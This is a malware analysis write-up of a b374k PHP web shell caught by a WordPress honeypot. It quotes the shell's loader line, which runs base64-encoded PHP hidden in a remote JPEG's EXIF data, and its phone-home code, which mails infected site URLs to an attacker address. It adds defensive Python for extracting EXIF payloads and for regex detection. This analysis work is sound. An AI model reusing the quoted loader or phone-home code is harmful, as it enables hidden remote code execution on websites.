Crouching JPEG, Hidden PH2

b374k shell 3.2.3 - 2018-03-02

An instance of b374k web shell, with a strange code retrieval from EXIF data in a JPG image from googleusercontent.com

Is this the original b374k shell?

Another analysis of this particular piece of malware.

Origin

Download

Downloaded as a plain file ("application/octet-stream") named b374k_3.2.3.php using the "Upload" tab of WordPress' plugin installer. Bad luck, this was part of a WordPress honeypot, so no plugins got installed.

IP Address 120.188.36.204

120.188.36.204 has domain name 120-188-36-204.resources.indosat.com

120-188-36-204.resources.indosat.com itself does not resolve in DNS (it is only the reverse name for the address).

inetnum:        120.188.36.0 - 120.188.36.255
netname:        GGSN-3G-ISAT-ID
descr:          GGSN 3G
descr:          INDOSAT's 3g Broadband Customer
descr:          Jakarta
country:        ID
admin-c:        IH151-AP
tech-c:         IH151-AP
remarks:        For abuse and spam report please contact abuse@indosat.com
status:         ALLOCATED NON-PORTABLE
mnt-by:         MAINT-ID-INDOSAT-INP
last-modified:  2009-06-10T02:12:04Z
source:         APNIC

person:         INDOSAT INP Hostmaster
nic-hdl:        IH151-AP
e-mail:         hostmaster@indosatooredoo.com
address:        PT Indosat
address:        Jl. Medan Merdeka Barat 21
address:        Jakarta Pusat
phone:          +62-21-30072088
                +62-8557897897
fax-no:         +62-21-30001073
country:        ID
mnt-by:         MAINT-ID-INDOSAT-INP
last-modified:  2015-11-30T04:59:02Z
source:         APNIC

traceroute to 120.188.36.204 (120.188.36.204), 30 hops max, 60 byte packets
 1  129-45-246-162.versonetworks.net (162.246.45.129)  28.207 ms  28.412 ms  28.374 ms
 2  10.100.100.1 (10.100.100.1)  28.382 ms  28.351 ms  28.318 ms
 3  v231.core1.den1.he.net (216.66.73.25)  28.320 ms  28.288 ms  28.274 ms
 4  100ge3-2.core1.sjc2.he.net (184.105.64.69)  62.876 ms  62.874 ms  62.841 ms
 5  10ge4-5.core1.pao1.he.net (72.52.92.69)  62.829 ms 100ge1-1.core1.pao1.he.net (72.52.92.158)  62.817 ms  62.799 ms
 6  eqix-sv8-ptindosat.com (198.32.176.167)  62.762 ms  64.298 ms  49.137 ms
 7  114-0-78-103.resources.indosat.com (114.0.78.103)  214.498 ms  214.476 ms  214.407 ms
 8  114-0-78-37.resources.indosat.com (114.0.78.37)  214.435 ms  214.416 ms  214.371 ms
 9  114-0-78-205.resources.indosat.com (114.0.78.205)  224.314 ms  224.299 ms  224.264 ms
10  114-4-19-102.resources.indosat.com (114.4.19.102)  224.222 ms  224.167 ms  224.158 ms
11  * * *
12  114-0-51-24.resources.indosat.com (114.0.51.24)  230.087 ms  232.118 ms  232.067 ms
13  * * *
    ...
30  * * *

Decoding/Deobfuscating/Tracking down files

Downloaded file b374k_3.2.3.php is not obfuscated in any form. It's just PHP source.

It does have code that should make any reader suspicious:

// Fetch the EXIF block of a remote JPEG (works when allow_url_fopen is on)
$BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
// The UserComment field holds base64-encoded PHP, which is decoded and executed
eval(base64_decode($BASED["COMPUTED"]["UserComment"]));

The PHP program exif_reader retrieves that URL and dumps the EXIF data: php exif_reader > exif_data. I also downloaded the JPG file from which that data derives. It's right here:

Crouching JPG, Hidden PHP

The UserComment element of the EXIF data does have a 2800 byte string in it. Invoking php usercomment.php > usercomment.out lets us see what that string has encoded, which is a small decoder.

Invoking php uc2.php > uc3.php peels off another layer of obfuscation. Invoking php uc3.php > uc4.php gives us what's probably the original PHP code.
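The extraction and layer-peeling chain above (exif_reader, then usercomment.php, uc2.php and uc3.php, each stripping one encoding layer) can be done in one pass. The following is an added analysis example, not code from this repository: it walks the JPEG marker segments to the Exif APP1 block, parses the TIFF IFDs by hand to reach the UserComment tag (0x9286), repeatedly base64-decodes the result while it still looks like base64, and reports which PHP markers survive in the innermost layer. The sample JPEG is constructed inline (EXIF scaffolding only, not a decodable picture) and carries a harmless stand-in payload rather than the real pacman.jpg contents; the function and tag names are this example's own.

```python
import base64
import binascii
import re
import struct

# EXIF tag numbers involved in the loader: IFD0 points at the Exif IFD, which holds UserComment
EXIF_IFD_POINTER = 0x8769
USER_COMMENT = 0x9286
# Strings a defender would expect to see in an embedded PHP payload once decoded
PHP_MARKERS = (b"<?php", b"eval(", b"base64_decode(", b"gzinflate(", b"$_GET", b"$_POST", b"$_SERVER")


def build_exif_jpeg(user_comment: bytes) -> bytes:
    """Constructed sample: SOI + one APP1/Exif segment + EOI, with UserComment in the Exif IFD.
    Little-endian TIFF; each IFD here is count(2) + one 12-byte entry + next-IFD offset(4) = 18 bytes."""
    payload = b"ASCII\0\0\0" + user_comment          # 8-byte character-code prefix, then the text
    ifd0_off, exif_off = 8, 8 + 18
    data_off = exif_off + 18
    tiff = b"II" + struct.pack("<HI", 42, ifd0_off)
    tiff += struct.pack("<H", 1) + struct.pack("<HHII", EXIF_IFD_POINTER, 4, 1, exif_off) + struct.pack("<I", 0)
    tiff += struct.pack("<H", 1) + struct.pack("<HHII", USER_COMMENT, 7, len(payload), data_off) + struct.pack("<I", 0)
    tiff += payload
    app1 = b"Exif\0\0" + tiff
    return b"\xff\xd8" + b"\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


def _jpeg_segments(jpeg: bytes):
    """Yield (marker, body) for every marker segment before the entropy-coded image data."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):                  # EOI or SOS: no further metadata segments
            return
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        yield marker, jpeg[pos + 4:pos + 2 + length]
        pos += 2 + length


def _ifd_entries(tiff: bytes, bo: str, offset: int):
    """Yield (tag, type, count, 4-byte value/offset field) for each entry of the IFD at offset."""
    count = struct.unpack(bo + "H", tiff[offset:offset + 2])[0]
    for i in range(count):
        e = offset + 2 + 12 * i
        tag, typ, n = struct.unpack(bo + "HHI", tiff[e:e + 8])
        yield tag, typ, n, tiff[e + 8:e + 12]


def exif_user_comment(jpeg: bytes):
    """Return the UserComment bytes (character-code prefix stripped) from the first Exif APP1, or None."""
    for marker, body in _jpeg_segments(jpeg):
        if marker != 0xE1 or not body.startswith(b"Exif\0\0"):
            continue
        tiff = body[6:]
        bo = "<" if tiff[:2] == b"II" else ">"
        ifd0 = struct.unpack(bo + "I", tiff[4:8])[0]
        exif_ifd = None
        for tag, _, _, val in _ifd_entries(tiff, bo, ifd0):
            if tag == EXIF_IFD_POINTER:
                exif_ifd = struct.unpack(bo + "I", val)[0]
        if exif_ifd is None:
            return None
        for tag, _, n, val in _ifd_entries(tiff, bo, exif_ifd):
            if tag == USER_COMMENT:
                # UNDEFINED type: n bytes, stored inline if they fit in 4 bytes, else at an offset
                raw = val[:n] if n <= 4 else tiff[struct.unpack(bo + "I", val)[0]:][:n]
                return raw[8:]
    return None


def peel_base64_layers(data: bytes, max_layers: int = 5):
    """Base64-decode repeatedly while the current layer is pure base64 text; returns every layer."""
    layers = [data]
    for _ in range(max_layers):
        text = layers[-1].strip()
        if not text or not re.fullmatch(rb"[A-Za-z0-9+/=\r\n]+", text):
            break
        try:
            layers.append(base64.b64decode(text, validate=False))
        except (binascii.Error, ValueError):
            break
    return layers


def analyse_jpeg(jpeg: bytes) -> dict:
    """Summarise whether a JPEG's UserComment hides an encoded PHP payload."""
    comment = exif_user_comment(jpeg)
    if comment is None:
        return {"user_comment": False, "layers": 0, "php_markers": []}
    layers = peel_base64_layers(comment)
    return {"user_comment": True, "comment_length": len(comment),
            "layers": len(layers) - 1, "php_markers": [m.decode() for m in PHP_MARKERS if m in layers[-1]]}


# Constructed stand-in payload wrapped in two base64 layers, mimicking the multi-layer chain above
INNER_PHP = b"<?php if (isset($_GET['0shell'])) { echo 'placeholder'; } ?>"
SAMPLE_JPEG = build_exif_jpeg(base64.b64encode(base64.b64encode(INNER_PHP)))

if __name__ == "__main__":
    print(analyse_jpeg(SAMPLE_JPEG))
```

Run against a real file with `analyse_jpeg(open("pacman.jpg", "rb").read())`; a non-zero layer count with PHP markers in the last layer is the signal that an image is acting as a code container rather than a picture.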

Analysis

The PHP code in pacman.jpg appears to execute every time b374k.php gets accessed. The first time this hidden PHP code executes it does a phone-home:

// Phone-home: mail the URL of the freshly infected site to a hardcoded address
$to = "syedich@yahoo.com";
$subject = $_SERVER['SERVER_NAME'];
$header = "From: Mastah <jancok@matamucok.com>";
$message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'];
mail($to, $subject, $message, $header);
// Drop an empty marker file so the phone-home only happens once
$m = fopen(".db", "w") or die (" ");
$txt = "";
fwrite($m, $txt);
fclose($m);

Creating a file named .db serves as a marker so that the hidden code does not phone home more than once.

The hidden code appears to be a small, crude web shell that only does things if certain HTTP GET parameters are set. The hidden code can upload a file to the infected WordPress site if "0upload" is set. The hidden code can download two files: https://sites.google.com/site/bhshll123/bh.txt if HTTP GET parameter "0shell" is set, and http://pastebin.com/raw/6JA72K8m if HTTP GET parameter "0deface" is set. Those parameter names suggest mischief! I also think the hidden code will execute before the b374k code does. You have to know about the hidden code - it's a layer of obscurity on top of the covert b374k shell download.
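The traits described in this section (EXIF loaded from a remote URL straight into eval(base64_decode(...)), a one-shot mail() phone-home, the .db marker file, and actions gated on 0-prefixed GET parameters) are all visible in static source and make a workable signature for triage. This is an added detection example, not part of the repository: it runs a small set of regexes over PHP source, reports the line of each hit, and scores the combination. The sample source is constructed to reproduce the two fragments quoted above with placeholder URL and addresses, and the indicator names and weights are this example's own choices.

```python
import re

# Each indicator: a regex over PHP source and a weight reflecting how rarely legitimate code matches it
INDICATORS = {
    "exif_remote_load":  (re.compile(r'exif_read_data\s*\(\s*["\']https?://', re.I), 3),
    "eval_base64":       (re.compile(r'eval\s*\(\s*base64_decode\s*\(', re.I), 4),
    "exif_to_eval":      (re.compile(r'eval\s*\(.*\[\s*["\']UserComment["\']\s*\]', re.I), 4),
    "sends_mail":        (re.compile(r'\bmail\s*\(', re.I), 1),
    "reports_hostname":  (re.compile(r'\$_SERVER\[\s*["\']SERVER_NAME["\']\s*\]', re.I), 1),
    "marker_file":       (re.compile(r'fopen\s*\(\s*["\']\.db["\']', re.I), 2),
    "zero_prefixed_get": (re.compile(r'\$_GET\[\s*["\']0(upload|shell|deface)["\']', re.I), 3),
}
SUSPICIOUS_SCORE = 5   # threshold chosen for this example: a lone mail() call stays below it


def scan_php(source: str) -> dict:
    """Map indicator name -> list of 1-based line numbers where it matches."""
    hits = {}
    for name, (pattern, _) in INDICATORS.items():
        for m in pattern.finditer(source):
            line = source.count("\n", 0, m.start()) + 1
            hits.setdefault(name, []).append(line)
    return hits


def verdict(hits: dict) -> dict:
    """Sum the weight of each distinct indicator seen and compare with the threshold."""
    score = sum(INDICATORS[name][1] for name in hits)
    return {"score": score, "suspicious": score >= SUSPICIOUS_SCORE, "indicators": sorted(hits)}


# Constructed sample: the loader stub and phone-home from the analysis, with placeholders
SAMPLE_PHP = r'''<?php
$BASED = exif_read_data("https://lh3.googleusercontent.com/PLACEHOLDER/pacman.jpg");
eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
if (!file_exists(".db")) {
    $to = "recipient@example.com";
    $subject = $_SERVER['SERVER_NAME'];
    $message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'];
    mail($to, $subject, $message, "From: Someone <sender@example.com>");
    $m = fopen(".db", "w") or die(" ");
    fclose($m);
}
if (isset($_GET['0upload'])) { /* upload handler */ }
'''

# Constructed benign sample: uses mail() but nothing else on the list
BENIGN_PHP = r'''<?php
$q = htmlspecialchars($_GET['q']);
mail("admin@example.com", "search", "query was: " . $q);
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_PHP), ("benign", BENIGN_PHP)):
        hits = scan_php(src)
        print(label, verdict(hits), hits)
```

The weighting matters more than any single regex: mail() and $_SERVER['SERVER_NAME'] are common in clean plugins, so they only tip the score when they appear alongside the remote-EXIF-into-eval pattern or the 0-prefixed parameters.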

bh.txt contains some CSS and HTML that look like legitimate Google code. I'm not sure what's going on with it: it's totally convoluted, and I'm not a JavaScript expert.

The pastebin URL gives me a 404 - not found.

The domain name "matamucok.com" does not appear in DNS or in whois information. As a "from" address I suppose lack of an IP address doesn't matter. "jancok@matamucok.com" doesn't show up in Google as such, but apparently that's an Indonesian name. "syedich@yahoo.com" does appear in Google, mostly in people mad about this particular web shell.